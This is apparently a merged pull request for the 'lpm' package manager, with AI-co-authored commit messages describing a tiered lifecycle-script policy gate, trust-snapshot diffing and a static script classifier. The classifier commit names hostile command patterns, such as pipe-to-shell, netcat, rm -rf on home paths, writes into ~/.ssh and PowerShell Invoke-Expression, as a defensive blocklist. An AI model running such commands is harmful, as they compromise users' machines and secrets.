Phase 46.0 — tiered script-policy gate (v0.23.0 released)#7
Merged
…, BlockedPackage fields
Adds the persisted-schema primitives for Phase 46's tiered triage gate
(plan §6). No BUILD_STATE_VERSION bump: additions are Option<T> with
serde defaults, so pre-46 and Phase-46 readers are mutually compatible.
New types in lpm-security:
- StaticTier enum (green | amber | amber-llm | red), kebab-case wire
- ProvenanceSnapshot { present, publisher, workflow, cert_sha256 }
BlockedPackage extensions (ownership per §11 field-ownership rule):
- static_tier — populated by P2 static classifier
- provenance_at_capture — populated by P4 provenance drift
- published_at — populated by P1 metadata plumbing
- behavioral_tags_hash — populated by P1 metadata plumbing
Reader check relaxed from `!=` to `>` so future minor additions don't
invalidate existing .lpm/build-state.json. Bump policy documented on
BUILD_STATE_VERSION: only breaking changes warrant a bump.
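A minimal sketch of the relaxed reader check described above. The constant value and the function name `check_state_version` are assumptions for illustration; only the comparison direction (`>` instead of `!=`) comes from this commit message.

```rust
/// Assumed value; the commit only states that no bump happened.
pub const BUILD_STATE_VERSION: u32 = 1;

/// Hypothetical helper: accepts any file written at this version or
/// older, and rejects only files written by a strictly newer version.
pub fn check_state_version(state_version: u32) -> Result<(), String> {
    if state_version > BUILD_STATE_VERSION {
        return Err(format!(
            "build-state version {state_version} is newer than supported {BUILD_STATE_VERSION}"
        ));
    }
    Ok(())
}
```

With `!=`, any additive change that bumped the version would have invalidated existing files; with `>`, only a file from the future is refused.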
Tests:
- StaticTier kebab-case serialization, round-trip, rejection of
camelCase + unknown variants
- ProvenanceSnapshot full + absent + partial parse + strict equality
- BlockedPackage mutual-compat both directions (v1 reader on
Phase-46-written file; Phase-46 reader on v1-written file)
- Reader rejects state_version > BUILD_STATE_VERSION; accepts equal
Full-workspace CI gate: clippy -D warnings clean, fmt clean,
3713/3714 tests pass (1 unrelated perf-threshold flake in lpm-task
filter::eval, different test each retry — load sensitivity, not a
regression).
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…ge flags
Adds the second P1 chunk: consolidated script-config loader, the new
policy-mode enum, and the CLI flag surface (plan §5.4 + D22). No
execution-semantics change yet — P1 only plumbs the resolved policy
through; tier-aware execution lands in P6 after the sandbox (D20).
New module: crates/lpm-cli/src/script_policy_config.rs
- ScriptPolicy enum (Deny | Allow | Triage), kebab-case wire, serde
default = Deny
- ScriptPolicyConfig { policy, auto_build, deny_all, trusted_scopes }
— one package.json pass for all four script-related keys
- collapse_policy_flags(): combines --policy / --yolo / --triage into
a single Option<ScriptPolicy>, trusting clap's conflicts_with_all
for the mutual-exclusion invariant
- resolve_script_policy(): full precedence chain
CLI > package.json > ~/.lpm/config.toml > default (deny)
CLI surface on both `lpm install` and `lpm build`:
- --policy=deny|allow|triage (canonical)
- --yolo (alias for --policy=allow)
- --triage (alias for --policy=triage)
Mutual-exclusion enforced at clap layer via conflicts_with_all;
invalid --policy values produce an actionable error naming the value
and the accepted list.
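The flag collapse and precedence chain above can be sketched roughly as follows. This is a simplified, std-only illustration: the real loader reads package.json and ~/.lpm/config.toml and relies on clap for mutual exclusion, whereas here the three sources are passed in as plain values and the signatures are assumptions.

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq, Default)]
pub enum ScriptPolicy {
    #[default]
    Deny,
    Allow,
    Triage,
}

impl ScriptPolicy {
    /// Parses the kebab-case wire form; anything else is None.
    pub fn parse(s: &str) -> Option<Self> {
        match s {
            "deny" => Some(Self::Deny),
            "allow" => Some(Self::Allow),
            "triage" => Some(Self::Triage),
            _ => None,
        }
    }
}

/// Collapses --policy / --yolo / --triage into one optional override.
/// Assumes the argument parser already rejected conflicting flags.
pub fn collapse_policy_flags(
    policy: Option<&str>,
    yolo: bool,
    triage: bool,
) -> Result<Option<ScriptPolicy>, String> {
    if yolo {
        return Ok(Some(ScriptPolicy::Allow));
    }
    if triage {
        return Ok(Some(ScriptPolicy::Triage));
    }
    match policy {
        None => Ok(None),
        Some(raw) => ScriptPolicy::parse(raw).map(Some).ok_or_else(|| {
            format!("invalid --policy value '{raw}' (expected one of: deny, allow, triage)")
        }),
    }
}

/// CLI > package.json > global config > default (deny).
pub fn resolve_script_policy(
    cli: Option<ScriptPolicy>,
    manifest: Option<ScriptPolicy>,
    global: Option<ScriptPolicy>,
) -> ScriptPolicy {
    cli.or(manifest).or(global).unwrap_or_default()
}
```

Keeping each layer as an `Option` is what preserves the explicit-deny-vs-unset distinction: an explicit `deny` in package.json still shadows an `allow` in the global config.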
Consolidation: deleted the two ad-hoc script-config readers:
- read_auto_build_config (install.rs:5480) → ScriptPolicyConfig.auto_build
- read_deny_all_config (build.rs:838) → ScriptPolicyConfig.deny_all
Their dedicated tests are removed; equivalent coverage lives in
script_policy_config::tests (15 tests: kebab parsing, all-four-keys
load, explicit-deny-vs-unset distinction, malformed JSON, invalid
value silent fallthrough, full precedence chain).
Verified end-to-end:
- `lpm install --help` renders all three flags with precedence doc
- `lpm install --yolo --triage` → clean clap conflict error
- `lpm install --policy=garbage` → actionable message with valid list
Full-workspace CI gate: clippy -D warnings clean, fmt clean,
1695/1695 tests pass on touched crates (lpm-security + lpm-cli). The
lpm-task filter::eval perf-threshold tests flake under parallel load
across the whole workspace; isolated serial re-run passes 168/168,
confirming load sensitivity rather than a regression.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…criptPolicy typos
Addresses two Medium findings from the third-round audit of the P1
CLI-surface commit (a15cbd3):
Finding 1: Help text promised behavior that doesn't exist yet.
Previous copy on --policy / --yolo / --triage described execution
semantics ("run every script without gating", "greens auto-approve in
sandbox") that land in a later phase; today these flags are accepted,
resolved, and logged only. Users running `lpm install --yolo` today
would reasonably expect scripts to run and be confused when nothing
changed.
Rewrote help copy on both install and build to open with "Status in
this build (Phase 46 P1): flag accepted and logged; does NOT change
execution behavior yet" and follow with what each value *will* do.
Lets CI / scripts opt in to future behavior now without misleading the
current UX.
Finding 2: Invalid package.json > lpm > scriptPolicy silently ignored.
Previous behavior: a typo in a team-shared manifest fell through to
each developer's ~/.lpm/config.toml or the default, silently producing
per-developer policy divergence. This is the wrong failure mode for
shared config.
ScriptPolicyConfig now carries `policy_parse_error: Option<String>`:
when `scriptPolicy` is present as a string but doesn't parse, this
field holds the offending input (loader still returns `policy: None`
so precedence falls through to global / default; the resolver's
contract is unchanged). Install + build handlers check the field and
emit `output::warn` with the value and accepted list when not in JSON
mode, so a typo is user-visible on every install.
Tested live: `package.json` with `"scriptPolicy": "invalid-typo"`
produces:
▲ package.json > lpm > scriptPolicy: invalid value 'invalid-typo'
(expected one of: deny, allow, triage); falling back to user
config / default
Architecture refactor:
resolve_script_policy(cli, &Path) →
resolve_script_policy(cli, &ScriptPolicyConfig).
Callers now load the config once at handler entry, inspect
policy_parse_error, then pass the loaded config to the resolver.
De-duplicates the two loader calls per invocation and keeps
warning-emission a caller concern (loader has no knowledge of JSON
mode or color output).
Tests:
- Renamed from_package_json_invalid_script_policy_is_silent_none →
..._surfaces_parse_error; asserts both policy==None AND
policy_parse_error==Some(input)
- New from_package_json_valid_script_policy_has_no_parse_error
- New from_package_json_absent_script_policy_has_no_parse_error
- New resolve_ignores_parse_error_uses_fallthrough pins the resolver
contract: parse-error does not block resolution
- Existing resolve_* tests updated for new signature
Finding 3 (helpers still use lenient name-only gate) is addressed in
the next planned P1 chunk (helper migration) per the field-ownership
discipline in the plan's §11 P1 scope.
Full-workspace CI gate: clippy -D warnings clean, fmt clean, 18/18
script_policy_config tests pass. lpm-task filter::eval perf-threshold
flakes under parallel load continue to be unrelated to these crates.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
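The Finding 2 contract (an invalid value yields `policy: None` plus a recorded parse error, while an absent key yields neither) might look like the sketch below. `LoadedPolicy` and `load_policy` are hypothetical stand-ins for the real ScriptPolicyConfig loader, which reads package.json rather than taking a string.

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum ScriptPolicy {
    Deny,
    Allow,
    Triage,
}

/// Hypothetical two-field projection of ScriptPolicyConfig.
#[derive(Debug, Default, PartialEq, Eq)]
pub struct LoadedPolicy {
    pub policy: Option<ScriptPolicy>,
    pub policy_parse_error: Option<String>,
}

/// `raw` is the manifest's scriptPolicy string, or None when the key is absent.
pub fn load_policy(raw: Option<&str>) -> LoadedPolicy {
    let Some(value) = raw else {
        // Absent key: nothing parsed, nothing to warn about.
        return LoadedPolicy::default();
    };
    let policy = match value {
        "deny" => Some(ScriptPolicy::Deny),
        "allow" => Some(ScriptPolicy::Allow),
        "triage" => Some(ScriptPolicy::Triage),
        _ => None,
    };
    LoadedPolicy {
        policy,
        // Keep the offending input only when parsing failed, so the
        // caller can warn while precedence still falls through.
        policy_parse_error: policy.is_none().then(|| value.to_string()),
    }
}
```

The loader stays free of output concerns; whether and how to print the warning is left to the caller, which knows about JSON mode.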
…ve policy
Addresses the Low-severity wording drift from the fourth-round audit:
the scriptPolicy typo warning was emitted BEFORE resolution and always
said the value was "falling back to user config / default". That is
only true when no CLI override is present. When the user passes
--policy, --yolo, or --triage, the CLI override is what actually
wins — so the warning's tail was misleading in that case.
Fix: move warning emission to AFTER `resolve_script_policy` and
include the resolved value in the message. One message works
across all three precedence paths:
no CLI override → "…effective policy: deny" (or global, if set)
--yolo → "…effective policy: allow"
--policy=triage → "…effective policy: triage"
Ordering is preserved: invalid CLI flag values (e.g. --policy=garbage)
still error out via `collapse_policy_flags` BEFORE we'd emit the
package.json warning, so the CLI error takes precedence over the
manifest warning as before.
Tested live:
▲ package.json > lpm > scriptPolicy: invalid value 'invalid-typo'
(expected one of: deny, allow, triage); this key was ignored —
effective policy: <deny|allow|triage>
Workspace gate clean: clippy -D warnings, fmt, 1698/1698 tests pass
on touched crates.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…cripted_packages_trusted use strict gate
Closes audit Finding 3 (third-round review). Pre-existing drift:
`build::run` uses `can_run_scripts_strict` (binds to
{name, version, integrity, script_hash}), but both the install-time
hint and the auto-build "all trusted" predicate used the lenient
`policy.can_run_scripts(name)` gate. Consequence: a drifted rich
binding was shown as `trusted ✓` in the install hint AND satisfied
the auto-build predicate, even though `build::run` would then skip
it — confusing UX at best, silent trust-drift bypass at worst.
Both helpers now use the same four-way TrustMatch handling as
`build::run` at build.rs:133:
- Strict → trusted
- LegacyNameOnly → trusted (build::run still runs with deprecation)
- BindingDrift → NOT trusted (behavior fix)
- NotTrusted → NOT trusted
OR-composed with is_scope_trusted, matching build::run exactly.
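The four-way handling above reduces to a small predicate. The sketch below assumes a TrustMatch enum with exactly the four variants listed; the function name `is_trusted` and the boolean `scope_trusted` parameter are illustrative, not the helpers' real signatures.

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum TrustMatch {
    Strict,
    LegacyNameOnly,
    BindingDrift,
    NotTrusted,
}

/// Hypothetical predicate mirroring the table above, OR-composed
/// with the scope-level trust check.
pub fn is_trusted(binding: TrustMatch, scope_trusted: bool) -> bool {
    let binding_trusted = match binding {
        TrustMatch::Strict | TrustMatch::LegacyNameOnly => true,
        // The behavior fix: a drifted rich binding no longer counts.
        TrustMatch::BindingDrift | TrustMatch::NotTrusted => false,
    };
    binding_trusted || scope_trusted
}
```

Matching exhaustively, without a wildcard arm, means a future fifth variant fails to compile until someone decides which side it belongs on.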
Signature change: both helpers' `packages` argument is now
`&[(String, String, Option<String>)]` (name, version, integrity).
Three call sites in install.rs updated to thread integrity through
(it's already on the existing InstallPackage struct — one field, no
data-flow refactor needed).
Extracted `scriptable_package_rows()` as a pure helper that
`show_install_build_hint()` now wraps; the pure helper is the test
surface for reviewer-prescribed regression case A.
Tests (reviewer prescription + positive control):
A. show_install_hint_drifted_rich_binding_is_not_trusted — drifted
rich binding MUST NOT be shown as `trusted ✓`. Pre-migration
this asserted true against `is_trusted`; now asserts false.
B. all_scripted_packages_trusted_false_on_drifted_rich_binding —
drifted rich binding MUST NOT satisfy the auto-build predicate.
Pre-migration: true; now false.
Positive control: scriptable_rows_strict_match_is_trusted — a rich
binding whose scriptHash matches the on-disk hash IS trusted.
Proves the drift tests distinguish "drifted" from "no binding."
Three existing helper tests updated to the new tuple signature
(integrity: None preserves their semantics since they use legacy
bare-name `trustedDependencies` arrays, which parse as LegacyNameOnly
— treated as trusted by both old and new gates).
Full-workspace CI gate: clippy -D warnings clean, fmt clean,
1701/1701 tests pass on touched crates (lpm-cli + lpm-security). The
lpm-task filter::eval perf-threshold tests continue to flake under
parallel load; serial re-run 168/168 confirms unrelated to this
migration.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…_hash populated on BlockedPackage
Closes the first of the three remaining P1 chunks. The Phase 46 schema
added optional `published_at` and `behavioral_tags_hash` fields to
BlockedPackage (commit 474fc59) but left them always-None; this commit
wires the producer that populates them from registry metadata.
New machinery:
- lpm-registry: BehavioralTags::active_tag_names() returns the
canonical camelCase names of the 22 tag-fields that are true, sorted
lexicographically. Static strings mirror the serde renames and the
server-side behavioral-tags.js schema so the hash is portable.
- lpm-security::triage: hash_behavioral_tag_set(&[&str]) produces a
deterministic "sha256-<hex>" digest with NUL separators
(adjacency-collision defense). Empty input hashes to a stable,
non-empty value (SHA-256 of empty string); callers distinguish "no
active tags" from "no metadata" at the call site.
- build_state: BlockedSetMetadata + BlockedSetMetadataEntry types
(keyed by (name, version)). New entry points
compute_blocked_packages_with_metadata and
capture_blocked_set_after_install_with_metadata consume the map.
Existing signatures preserved as thin wrappers passing an empty
metadata map: zero test churn across the ~30 callers that use them.
Install pipeline (install.rs):
- build_blocked_set_metadata() async helper iterates packages and
fetches registry metadata via the existing TTL-cached client API.
Extracts time[version] → published_at and
versions[version]._behavioralTags → hash_behavioral_tag_set. Returns
empty map on errors (graceful degradation; must never fail install).
- Primary install path calls the _with_metadata variant with the built
map. Fast-path (run_link_and_finish) still uses the no-metadata
wrapper; fields stay None there, which is documented degradation (the
lockfile fast-path has no populated TTL cache).
Tests (5 new in build_state::tests):
- compute_with_metadata_forwards_published_at_and_behavioral_tags_hash
- compute_with_metadata_missing_entry_leaves_fields_none (graceful)
- compute_with_metadata_partial_entry_forwards_only_populated_half
- backward_compat_wrapper_captures_with_empty_metadata
- metadata_fingerprint_is_independent_of_metadata (design invariant:
the blocked-set fingerprint is over blockable packages + their strict
binding only, NOT over their metadata; registry churn must not
re-fire the blocked-set suppression banner)
Plus 6 new tests in lpm-security::triage::tests covering the hashing
helper: sha256- prefix + fixed length, empty-input pinned digest, order
sensitivity (caller contract), NUL-separator adjacency defense,
determinism, subset-distinction.
Full-workspace CI gate: clippy -D warnings clean, fmt clean, 1821/1821
tests pass on touched crates. Field ownership matches the Phase 46 plan
§11 P1 table: published_at + behavioral_tags_hash are P1-owned;
static_tier + provenance_at_capture remain None until P2 and P4.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
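To illustrate why the NUL separator matters for the tag-set hash, the sketch below builds only the byte string that would be fed to SHA-256; the hashing step itself is omitted because it needs a crate outside std. `tag_set_preimage` is a hypothetical name, and placing the NUL between tags (rather than after each one) is an assumption.

```rust
/// Hypothetical helper: joins tag names with a NUL byte so that
/// adjacent names cannot run together before hashing.
pub fn tag_set_preimage(tags: &[&str]) -> Vec<u8> {
    let mut out = Vec::new();
    for (i, tag) in tags.iter().enumerate() {
        if i > 0 {
            out.push(0u8); // separator between adjacent tag names
        }
        out.extend_from_slice(tag.as_bytes());
    }
    out
}
```

Without the separator, ["ab", "c"] and ["a", "bc"] would both serialize to "abc" and hash identically. An empty slice yields an empty pre-image, which is consistent with the "SHA-256 of empty string" behavior noted above.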
Closes the second of the three remaining P1 chunks. Implements plan
§4.2: detect silent additions to `package.json > lpm >
trustedDependencies` between installs. Motivating case: a "bump dep"
PR that quietly grows the trust list gets flagged locally instead of
slipping past code review.
New module: crates/lpm-cli/src/trust_snapshot.rs
- TrustSnapshot { schema_version, captured_at, bindings } persisted
to `<project_dir>/.lpm/trust-snapshot.json`. BTreeMap-keyed for
deterministic on-disk ordering.
- SnapshotEntry { integrity, script_hash } — minimal 2-field
projection of TrustedDependencyBinding. Does NOT capture Phase 46
audit fields (approved_by, approved_by_model_exact) — those belong
to the manifest's audit trail, not the "did-the-set-change" diff.
- TrustSnapshot::capture_current pattern-matches the Legacy / Rich
variants directly rather than calling TrustedDependencies::iter
(which normalizes keys to the name-portion only and would collapse
per-version granularity).
- TrustSnapshot::diff_additions — keys in current not in previous,
sorted. Returns empty on "no previous" (first install). Deliberately
ignores removals (not a security concern) and same-key binding
changes (already handled by BindingDrift in the install path).
- Schema-versioned parallel to BuildState: SCHEMA_VERSION = 1; same
no-version-bump policy for additive field changes.
- format_new_bindings_notice produces the user-facing multi-line
notice pointing at `lpm trust diff` (the inspection CTA — ships
in chunk C).
- write_snapshot is atomic (temp-then-rename); crash safety matches
build-state.json.
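A rough sketch of the additions-only diff described above, assuming the bindings are a BTreeMap keyed by the manifest key. The `Option<String>` field types and the free-function form are assumptions; the commit names only the struct fields and the method `TrustSnapshot::diff_additions`.

```rust
use std::collections::BTreeMap;

/// Minimal 2-field projection, as described above (field types assumed).
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct SnapshotEntry {
    pub integrity: Option<String>,
    pub script_hash: Option<String>,
}

pub type Bindings = BTreeMap<String, SnapshotEntry>;

/// Keys present in `current` but not in `previous`, in sorted order.
/// Returns empty when there is no previous snapshot (first install).
pub fn diff_additions(previous: Option<&Bindings>, current: &Bindings) -> Vec<String> {
    let Some(previous) = previous else {
        return Vec::new();
    };
    current
        .keys() // BTreeMap iterates keys in sorted order
        .filter(|key| !previous.contains_key(*key))
        .cloned()
        .collect()
}
```

Because only keys are compared, removals and same-key binding changes fall out of the result without any extra logic.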
Install pipeline (install.rs):
- Pre-install: after "Installing dependencies for X" and before the
lockfile fast-path branch, read prior snapshot, diff against
current manifest, emit notice via output::info. Suppressed in
--json mode (no stable JSON schema yet; agents get the same data
from `lpm trust diff` in chunk C).
- Post-install: snapshot write on BOTH the main path and the
run_link_and_finish fast path. The fast path is reached when only
trustedDependencies changed (lockfile still valid) so skipping
snapshot write there would leave the next install diffing against
stale state. Write failures are tracing::warn only — non-fatal,
graceful degradation.
Tests (16 in trust_snapshot::tests):
- capture_current: empty, rich bindings, legacy bare-name keying
- diff_additions: no previous, additions detected, removals ignored,
binding-changes ignored, multi-addition sort invariant
- format_new_bindings_notice: empty → None, populated → CTA present
- read/write: round-trip, missing file, malformed JSON, newer
schema_version refused, atomic-write leaves no .tmp file
- End-to-end regression (audit prescription A):
install_n_writes_snapshot_install_n_plus_1_detects_addition —
simulates the full flow from snapshot-write through diff on the
next install; asserts both the additions list and the rendered
notice include the poisoned-PR addition.
Full-workspace CI gate: clippy -D warnings clean, fmt clean,
1837/1837 tests pass on touched crates. Field ownership: P1 owns
.lpm/trust-snapshot.json per plan §11 — done here.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…complete
Closes the final P1 chunk. Adds the user-facing surface over the
trust-snapshot persistence machinery (8c03c55): inspection via
`lpm trust diff`, active cleanup via `lpm trust prune`.
New module: crates/lpm-cli/src/commands/trust.rs
- TrustCmd clap subcommand enum with Diff and Prune variants.
- compute_full_diff returns added / removed / changed entries across
the snapshot → current manifest transition, ordered
added-then-removed-then-changed with stable lexicographic sort within
each class (matches the rendering convention).
- compute_stale_keys extracts the NAME portion from Rich keys
(`name@version`) via `rfind('@')` so scoped packages like
`@myorg/pkg@1.0.0` resolve to `@myorg/pkg` correctly. Version drift
(same name, different version) is NOT flagged as stale; that's
BindingDrift territory.
- remove_stale_from_manifest handles both Legacy (filter array in
place) and Rich (remove map keys) shapes of trustedDependencies.
- Atomic manifest writer (temp-then-rename) mirrors the snapshot
writer's crash-safety pattern.
- Stable JSON schema on `--json` with SCHEMA_VERSION = 1 per P9
telemetry discipline.
`lpm trust diff`:
- `--json` emits structured { added, removed, changed } arrays plus
the snapshot's `captured_at` for agent consumption.
- Human mode renders `+ added`, `- removed`, `~ changed` with
per-field delta ("integrity: sha512-old → sha512-new") for changed
entries.
- Empty diff reports "unchanged since last install (<timestamp>)".
`lpm trust prune`:
- Reads lpm.lock to determine installed names; refuses to run if
lockfile is missing.
- `--dry-run` to preview; `--yes` for non-TTY; non-TTY without `--yes`
is a hard error (prevents silent mutation in CI).
- `--json` emits `{ stale_count, stale[], dry_run, mutated }`.
- Confirmation prompt on TTY via cliclack.
main.rs:
- New `Trust { action: TrustCmd }` variant with inline subcommand
dispatch following the `Global { action: GlobalCmd }` pattern already
established in the codebase.
Tests (13 in commands::trust::tests):
- compute_full_diff: empty, added/removed/changed classification +
ordering invariant, identical → empty
- compute_stale_keys: rich entries by name (strips @version), scoped
package name extraction (last-@ rule), legacy bare names, empty
manifest, version-drift-is-not-stale regression
- remove_stale_from_manifest: rich map, legacy array, nonexistent key
is no-op
- write_manifest atomic-write-no-tmp-leak
- End-to-end prune_removes_stale_entry_and_leaves_active_entry_intact
(audit prescription B): real package.json + fake lockfile, invoke
run_prune via tokio runtime, assert file contents post-mutation.
Full-workspace CI gate: clippy -D warnings clean, fmt clean, 1850/1850
tests pass on touched crates (lpm-cli + lpm-security + lpm-registry).
Phase 46 P1 IS COMPLETE. Branch phase-46 has 8 commits covering:
- Schema extensions (474fc59)
- ScriptPolicyConfig + --policy/--yolo/--triage flags (a15cbd3)
- Audit honesty fixes: help text + scriptPolicy typo warning (403a041)
- Audit v3: warning names effective policy (665e74b)
- Helper migration: strict gate in show_install_build_hint +
all_scripted_packages_trusted (107fde5)
- Metadata plumbing: published_at + behavioral_tags_hash (f13541c)
- Trust-snapshot persistence + diff notice (8c03c55)
- lpm trust diff + lpm trust prune (this commit)
Next phase: P2 static classifier. All P1 field-ownership obligations
met per plan §11:
- Schema extensions (done)
- Helper migration (done)
- Config consolidation (ScriptPolicyConfig done)
- Metadata plumbing (published_at, behavioral_tags_hash done)
- Trust-snapshot persistence (done)
- lpm trust diff/prune (done)
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
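The last-@ rule used for name extraction can be sketched as below. `package_name_from_key` is a hypothetical name; the `idx > 0` guard, which leaves a bare scoped name such as `@myorg/pkg` untouched, is an assumption about how legacy bare names are treated.

```rust
/// Hypothetical helper: returns the name portion of a `name@version`
/// key, using the LAST '@' so scoped names keep their leading '@'.
pub fn package_name_from_key(key: &str) -> &str {
    match key.rfind('@') {
        // An '@' at index 0 is the scope marker, not a version separator.
        Some(idx) if idx > 0 => &key[..idx],
        _ => key,
    }
}
```

Splitting on the first '@' instead would turn `@myorg/pkg@1.0.0` into an empty name, which is the failure the `rfind` choice avoids.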
… + error on malformed TD
Closes two Low findings from the end-of-P1 audit:
F1: `lpm trust prune --json` emitted the structured output BEFORE the
write, with an optimistic `mutated: true` that the subsequent
non-TTY/confirmation guard could invalidate by erroring out. The JSON
contract was unreliable for automation.
Fix: restructure `run_prune` so at most ONE terminal output is emitted
per invocation, always post-mutation (or post-decision-not-to-mutate):
- empty stale → mutated: false, no write
- dry-run → mutated: false, no write
- non-TTY + !yes → Err before any output
- write_manifest fails → Err propagates, no JSON emitted
- success → mutated: true, emitted AFTER write_manifest returns Ok
`mutated` is now an accurate post-condition, not a prediction.
F2: `extract_trusted_dependencies` used `unwrap_or_default()`, so a
manifest with a malformed `lpm.trustedDependencies` value (typo, wrong
shape, etc.) silently degraded to "empty set"; prune then reported
"nothing to prune" and exited 0. The typed read path used by
`trust diff` (via `lpm_workspace::read_package_json`) already errors on
this; `trust prune` now matches that strictness.
Fix: `extract_trusted_dependencies` returns
Result<TrustedDependencies, LpmError>; propagates via `?` in run_prune.
Error message names the offending key and the accepted forms (legacy
array vs. Phase-4 rich map). Absent key path unchanged: still
Ok(default).
Tests (7 new in commands::trust::tests, bringing trust to 20/20):
Unit:
- extract_trusted_dependencies_absent_key_is_ok_default
- extract_trusted_dependencies_valid_legacy_array_parses
- extract_trusted_dependencies_valid_rich_map_parses
- extract_trusted_dependencies_malformed_shape_errors (4 bad shapes
exercised: number, string, bool, array-of-non-strings)
End-to-end (filesystem-observable post-conditions; no stdout capture
required, because file state on disk is the authoritative proof that
the JSON emission matches reality):
- run_prune_empty_stale_does_not_mutate_manifest: byte-identical
pre/post, proves no spurious write when nothing is stale
- run_prune_dry_run_does_not_mutate_manifest: same, with a real stale
entry present and --dry-run honored
- run_prune_malformed_trusted_deps_errors_before_any_write: F2
end-to-end, bad shape surfaces as LpmError + file unchanged
Full-workspace CI gate: clippy -D warnings clean, fmt clean, 20/20
trust tests pass.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
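The F1 restructuring (report `mutated` only after the write has actually succeeded) might be sketched like this. Everything here is illustrative: `PruneReport`, `run_prune_sketch`, the `String` error type, and the injected `write_manifest` closure are assumptions standing in for the real `run_prune`, and the interactive confirmation step is elided.

```rust
#[derive(Debug, PartialEq, Eq)]
pub struct PruneReport {
    pub stale_count: usize,
    pub dry_run: bool,
    pub mutated: bool,
}

/// Returns exactly one report per invocation, built only after the
/// decision (or the write) has actually happened.
pub fn run_prune_sketch(
    stale_count: usize,
    dry_run: bool,
    is_tty: bool,
    yes: bool,
    write_manifest: impl FnOnce() -> Result<(), String>,
) -> Result<PruneReport, String> {
    if stale_count == 0 || dry_run {
        // Nothing to do, or preview only: no write, mutated stays false.
        return Ok(PruneReport { stale_count, dry_run, mutated: false });
    }
    if !is_tty && !yes {
        // Hard error before any output is produced.
        return Err("refusing to prune on a non-TTY without --yes".to_string());
    }
    // A failed write propagates as Err, so no report is emitted at all.
    write_manifest()?;
    Ok(PruneReport { stale_count, dry_run, mutated: true })
}
```

Since the report is the function's return value, a caller cannot serialize it before the write has returned Ok.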
New pure, deterministic classifier for lifecycle-script bodies.
Emits Green | Amber | Red only; AmberLlm is reserved for P8.
Classification semantics (P2 = classification-only per D20):
- Green: exact match of curated allowlist (node-gyp rebuild, tsc
[-b|-p path], prisma generate, husky [install], electron-rebuild,
node <safe-relative>.{js,cjs,mjs} where basename is NOT install.js
/ postinstall.js).
- Red: hand-curated blocklist — pipe-to-shell (curl|sh, wget|bash,
base64 -d|sh), node -e / --eval, iex / nc / netcat / ncat / eval,
nested package managers (npm/pnpm/yarn/bun/lpm/pip/gem/cargo/brew
install), rm -rf on ~/$HOME/absolute paths, chmod +x/777 outside
package, redirects into ~/.bashrc / ~/.ssh/** / /etc/** /root/**,
PowerShell literals (Invoke-Expression, FromBase64String,
Add-MpPreference), Unicode control chars (Trojan Source class).
- Amber: everything else, including compound commands AND network
binary downloaders (playwright install, puppeteer, cypress install,
electron-builder install-app-deps) per D18.
Pipeline ordering (per §4.1 with the review-round refinement):
1. Raw-string red prefilter (Unicode + PowerShell literals)
2. Quote-aware operator normalization (see below)
3. shlex tokenization (parse failure → Amber)
4. Tokenized red checks (MUST precede compound fallback so
curl … | sh → Red, not Amber)
5. Compound-operator detection (any &&, ||, ;, |, >, >>, <, <<, &,
( ), $(, backtick) → Amber
6. Green allowlist match
7. Fallback → Amber
Quote-aware operator normalizer fixes a review-round finding: shlex
splits on whitespace but does NOT recognize shell operators, so
`curl url|sh` tokenized as ["curl", "url|sh"] and silently
downclassified to Amber via the compound fallback. The normalizer
pads every UNQUOTED operator with surrounding whitespace before
shlex sees the string, tracks single-quote / double-quote /
backslash-escape state, and recognizes the four two-char operators
(&&, ||, >>, <<) as atomic units.
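A simplified sketch of a quote-aware operator normalizer in the spirit of the one described above. It covers only a subset of the operators (`&`, `|`, `>`, `<`, `;` and the four two-char forms); parentheses, `$(` and backticks are left out, and the function name is hypothetical.

```rust
/// Pads every UNQUOTED shell operator with spaces so that a
/// whitespace-based tokenizer sees it as its own token.
pub fn pad_unquoted_operators(input: &str) -> String {
    let chars: Vec<char> = input.chars().collect();
    let mut out = String::with_capacity(input.len() + 8);
    let mut in_single = false;
    let mut in_double = false;
    let mut i = 0;
    while i < chars.len() {
        let c = chars[i];
        if in_single {
            // Everything is literal until the closing single quote.
            in_single = c != '\'';
            out.push(c);
            i += 1;
        } else if c == '\\' {
            // Backslash escapes the next character; copy both verbatim.
            out.push(c);
            if let Some(&next) = chars.get(i + 1) {
                out.push(next);
            }
            i += 2;
        } else if in_double {
            in_double = c != '"';
            out.push(c);
            i += 1;
        } else if c == '\'' || c == '"' {
            in_single = c == '\'';
            in_double = c == '"';
            out.push(c);
            i += 1;
        } else if matches!(c, '&' | '|' | '>' | '<' | ';') {
            // Treat &&, ||, >>, << as one atomic operator.
            let doubled = c != ';' && chars.get(i + 1) == Some(&c);
            out.push(' ');
            out.push(c);
            if doubled {
                out.push(c);
            }
            out.push(' ');
            i += if doubled { 2 } else { 1 };
        } else {
            out.push(c);
            i += 1;
        }
    }
    out
}
```

Applied to `curl url|sh`, the pipe becomes its own token, so a tokenized red check can see `|` followed by `sh` instead of the fused `url|sh`.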
Contract: no execution semantics change. P2 populates static_tier
on BlockedPackage for UX annotation only; auto-execution of greens
is gated on P5 (sandbox) + P6 (tier-aware auto-run).
Ship:
- Adds shlex = "1.3" to workspace deps.
- 58 unit tests in static_gate::tests, including 7 regression tests
for the no-space operator finding (curl|sh, base64 -d|sh,
echo hi>~/.bashrc, tsc&&husky install, and three negative cases
covering quoted / escaped operator characters).
CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings ✓
- cargo fmt --check ✓
- grep -r 'fancy-regex' crates/*/Cargo.toml ✓ (empty)
- cargo build --workspace ✓
- cargo nextest run --workspace --exclude lpm-integration-tests ✓
(3834 pass; known flake lpm-task perf_eval_glob passes serially)
- cargo nextest run -p lpm-security ✓ (387/387)
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
